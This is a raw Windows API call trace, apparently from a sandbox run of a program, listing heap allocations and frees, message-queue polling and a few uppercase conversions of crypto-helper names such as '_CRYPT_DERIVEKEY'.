[0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8628 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8628 | out: hHeap=0xbe0000) returned 1 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8628 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf60d8 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf60d8 | out: hHeap=0xbe0000) returned 1 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8628 | out: hHeap=0xbe0000) returned 1 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8628 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf60d8 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85e0 [0250.189] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85e0 | out: hHeap=0xbe0000) returned 1 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.189] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf60d8 | out: hHeap=0xbe0000) returned 1 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf60d8 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85e0 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85f8 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.190] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85f8 | out: hHeap=0xbe0000) returned 1 [0250.190] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.190] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85e0 | out: hHeap=0xbe0000) returned 1 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85e0 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85f8 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf60a8 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.190] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf60a8 | out: hHeap=0xbe0000) returned 1 [0250.190] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.190] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85f8 | out: hHeap=0xbe0000) returned 1 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85f8 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf60a8 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85b0 [0250.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.190] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85b0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf60a8 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fe0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fd0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fc0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fb0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fa0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dcd8 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8658 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6258 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8778 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8760 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8730 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6228 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf61f8 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8748 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8700 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf61c8 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8718 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86d0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6198 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86e8 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86a0 | out: hHeap=0xbe0000) returned 1 [0250.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6168 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86b8 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8670 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6138 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8688 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8640 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01a00 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.192] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe76900 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53000 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe76900 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fa0 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40f50 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fb0 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fb0 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fa0 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40f50 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe74d20 [0250.192] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53010 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.193] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0250.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcd8 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53010 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd00 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8640 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53000 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fa0 [0250.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fa0 | out: hHeap=0xbe0000) returned 1 [0250.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8688 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd28 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6138 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53000 [0250.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6138 | out: hHeap=0xbe0000) returned 1 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd50 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6138 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a00 [0250.193] PeekMessageW (in: lpMsg=0x8bf1fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf1fc) returned 0 [0250.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fa0 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fa0 | out: hHeap=0xbe0000) returned 1 [0250.194] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8670 [0250.194] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86b8 [0250.194] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6168 [0250.194] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fa0 [0250.194] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fb0 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fb0 | out: hHeap=0xbe0000) returned 1 [0250.194] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fb0 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fb0 | out: hHeap=0xbe0000) returned 1 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6168 | out: hHeap=0xbe0000) returned 1 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fa0 | out: hHeap=0xbe0000) returned 1 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86b8 | out: hHeap=0xbe0000) returned 1 [0250.194] PeekMessageW (in: lpMsg=0x8bf1fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf1fc) returned 0 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01a00 | out: hHeap=0xbe0000) returned 1 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6138 | out: hHeap=0xbe0000) returned 1 [0250.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dd50 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53000 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dd28 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8688 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dcd8 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8640 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dd00 | out: hHeap=0xbe0000) returned 1 [0250.195] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe74d20 | out: hHeap=0xbe0000) returned 1 [0250.195] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe74ce0 | out: hHeap=0xbe0000) returned 1 [0250.195] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53010 [0250.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8640 [0250.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a00 [0250.195] PeekMessageW (in: lpMsg=0x8bf1fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf1fc) returned 0 [0250.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.196] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.196] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87c0 | out: hHeap=0xbe0000) returned 1 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53040 | out: hHeap=0xbe0000) returned 1 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf62b8 | out: hHeap=0xbe0000) returned 1 [0250.196] PeekMessageW (in: lpMsg=0x8bf1fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf1fc) returned 0 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01a00 | out: hHeap=0xbe0000) returned 1 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8640 | out: hHeap=0xbe0000) returned 1 [0250.196] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.196] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53040 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53040 | out: hHeap=0xbe0000) returned 1 [0250.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe019b8 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8868 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dc38 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dc88 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87d8 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dc10 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53060 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dbe8 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.197] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8610 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8628 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf60d8 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85e0 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85f8 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40f30 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe766e0 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f70 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8790 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6288 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dcb0 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8850 | out: hHeap=0xbe0000) returned 1 [0250.198] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.198] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe74ce0 [0250.198] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.198] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53020 [0250.198] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52f70 [0250.198] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40f30 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40f30 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f70 | out: hHeap=0xbe0000) returned 1 [0250.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0xbe0000) returned 1 [0250.198] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe74d20 [0250.199] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53020 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f70 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.199] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0250.199] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.199] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f70 | out: hHeap=0xbe0000) returned 1 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcb0 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe52f70 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dbe8 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8850 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53060 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6288 [0250.199] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53060 | out: hHeap=0xbe0000) returned 1 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53060 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8790 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53050 [0250.199] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf85f8 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc10 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85e0 [0250.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53050 [0250.200] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf85e0 | out: hHeap=0xbe0000) returned 1 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc88 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85e0 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf60d8 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc38 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8628 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53040 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8610 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.200] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd00 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53010 [0250.200] 